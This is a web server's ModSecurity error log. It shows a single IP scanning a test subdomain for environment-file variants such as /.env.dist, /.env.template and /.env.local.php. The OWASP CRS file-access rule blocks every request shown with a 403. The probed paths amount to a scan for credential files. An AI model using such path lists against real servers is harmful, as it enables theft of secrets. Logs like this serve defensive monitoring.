[Fri Jan 16 03:14:12.867112 2026] [:error] [pid 1444034] [client 45.148.10.246:47028] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aWme9ORfEYyDES-ZFL4gjQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dist
[Fri Jan 16 03:14:12.867344 2026] [:error] [pid 1444034] [client 45.148.10.246:47028] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aWme9ORfEYyDES-ZFL4gjQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dist
[Fri Jan 16 03:14:12.867523 2026] [:error] [pid 1444034] [client 45.148.10.246:47028] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "aWme9ORfEYyDES-ZFL4gjQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dist
[Fri Jan 16 03:14:13.041296 2026] [:error] [pid 1444035] [client 45.148.10.246:47044] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9bauW6yeGWXfDeFWTgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.template
[Fri Jan 16 03:14:13.041562 2026] [:error] [pid 1444035] [client 45.148.10.246:47044] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9bauW6yeGWXfDeFWTgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.template
[Fri Jan 16 03:14:13.041745 2026] [:error] [pid 1444035] [client 45.148.10.246:47044] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9bauW6yeGWXfDeFWTgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.template
[Fri Jan 16 03:14:13.162836 2026] [:error] [pid 1444032] [client 45.148.10.246:47054] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.template/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template/"] [unique_id "aWme9ekMvq8uPO2ZciWojAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.template/
[Fri Jan 16 03:14:13.163083 2026] [:error] [pid 1444032] [client 45.148.10.246:47054] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template/"] [unique_id "aWme9ekMvq8uPO2ZciWojAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.template/
[Fri Jan 16 03:14:13.163240 2026] [:error] [pid 1444032] [client 45.148.10.246:47054] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template/"] [unique_id "aWme9ekMvq8uPO2ZciWojAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.template/
[Fri Jan 16 03:14:13.308173 2026] [:error] [pid 1444040] [client 45.148.10.246:47062] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9fn_5sIyKhJ5GAzXswAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.template
[Fri Jan 16 03:14:13.308389 2026] [:error] [pid 1444040] [client 45.148.10.246:47062] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9fn_5sIyKhJ5GAzXswAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.template
[Fri Jan 16 03:14:13.308532 2026] [:error] [pid 1444040] [client 45.148.10.246:47062] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9fn_5sIyKhJ5GAzXswAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.template
[Fri Jan 16 03:14:13.468325 2026] [:error] [pid 1444031] [client 45.148.10.246:47066] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9X-9MmrgwjmYTAJQcQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.template
[Fri Jan 16 03:14:13.468549 2026] [:error] [pid 1444031] [client 45.148.10.246:47066] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9X-9MmrgwjmYTAJQcQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.template
[Fri Jan 16 03:14:13.468707 2026] [:error] [pid 1444031] [client 45.148.10.246:47066] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.template"] [unique_id "aWme9X-9MmrgwjmYTAJQcQAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.template
[Fri Jan 16 03:14:13.593194 2026] [:error] [pid 1444033] [client 45.148.10.246:47072] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.default"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9dLJkp65ULFQ2YYgmQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.default
[Fri Jan 16 03:14:13.593418 2026] [:error] [pid 1444033] [client 45.148.10.246:47072] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9dLJkp65ULFQ2YYgmQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.default
[Fri Jan 16 03:14:13.593589 2026] [:error] [pid 1444033] [client 45.148.10.246:47072] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9dLJkp65ULFQ2YYgmQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.default
[Fri Jan 16 03:14:13.728101 2026] [:error] [pid 1444034] [client 45.148.10.246:47080] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.default/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default/"] [unique_id "aWme9eRfEYyDES-ZFL4gjgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.default/
[Fri Jan 16 03:14:13.728389 2026] [:error] [pid 1444034] [client 45.148.10.246:47080] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default/"] [unique_id "aWme9eRfEYyDES-ZFL4gjgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.default/
[Fri Jan 16 03:14:13.728559 2026] [:error] [pid 1444034] [client 45.148.10.246:47080] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default/"] [unique_id "aWme9eRfEYyDES-ZFL4gjgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.default/
[Fri Jan 16 03:14:13.903668 2026] [:error] [pid 1444035] [client 45.148.10.246:47094] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.default"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9bauW6yeGWXfDeFWTwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.default
[Fri Jan 16 03:14:13.903890 2026] [:error] [pid 1444035] [client 45.148.10.246:47094] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9bauW6yeGWXfDeFWTwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.default
[Fri Jan 16 03:14:13.904052 2026] [:error] [pid 1444035] [client 45.148.10.246:47094] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9bauW6yeGWXfDeFWTwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.default
[Fri Jan 16 03:14:14.072340 2026] [:error] [pid 1444032] [client 45.148.10.246:47102] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.default"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9ukMvq8uPO2ZciWojQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.default
[Fri Jan 16 03:14:14.072570 2026] [:error] [pid 1444032] [client 45.148.10.246:47102] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9ukMvq8uPO2ZciWojQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.default
[Fri Jan 16 03:14:14.072752 2026] [:error] [pid 1444032] [client 45.148.10.246:47102] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.default"] [unique_id "aWme9ukMvq8uPO2ZciWojQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.default
[Fri Jan 16 03:14:14.258475 2026] [:error] [pid 1444040] [client 45.148.10.246:47104] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9vn_5sIyKhJ5GAzXtAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php
[Fri Jan 16 03:14:14.258701 2026] [:error] [pid 1444040] [client 45.148.10.246:47104] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9vn_5sIyKhJ5GAzXtAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php
[Fri Jan 16 03:14:14.258879 2026] [:error] [pid 1444040] [client 45.148.10.246:47104] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9vn_5sIyKhJ5GAzXtAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php
[Fri Jan 16 03:14:14.399488 2026] [:error] [pid 1444031] [client 45.148.10.246:47106] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php/"] [unique_id "aWme9n-9MmrgwjmYTAJQcgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php/
[Fri Jan 16 03:14:14.399713 2026] [:error] [pid 1444031] [client 45.148.10.246:47106] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php/"] [unique_id "aWme9n-9MmrgwjmYTAJQcgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php/
[Fri Jan 16 03:14:14.399873 2026] [:error] [pid 1444031] [client 45.148.10.246:47106] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php/"] [unique_id "aWme9n-9MmrgwjmYTAJQcgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php/
[Fri Jan 16 03:14:14.539493 2026] [:error] [pid 1444033] [client 45.148.10.246:47112] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9tLJkp65ULFQ2YYgmgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php
[Fri Jan 16 03:14:14.539736 2026] [:error] [pid 1444033] [client 45.148.10.246:47112] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9tLJkp65ULFQ2YYgmgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php
[Fri Jan 16 03:14:14.539889 2026] [:error] [pid 1444033] [client 45.148.10.246:47112] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9tLJkp65ULFQ2YYgmgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.php
[Fri Jan 16 03:14:14.675742 2026] [:error] [pid 1444034] [client 45.148.10.246:47116] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9uRfEYyDES-ZFL4gjwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php
